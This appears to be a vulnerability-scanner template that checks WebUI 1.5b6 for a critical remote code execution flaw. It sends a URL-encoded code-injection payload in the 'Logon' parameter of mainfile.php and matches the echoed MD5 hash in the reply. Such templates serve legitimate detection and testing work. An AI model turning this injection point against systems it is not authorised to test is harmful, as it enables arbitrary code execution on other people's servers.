id: webui-rce

info:
  name: WebUI 1.5b6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
  reference:
    - https://www.exploit-db.com/exploits/36821
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: webui,rce,edb

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c5b3d7397a90f42d222f7ed9408c0dc6"
        part: body

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/06/03
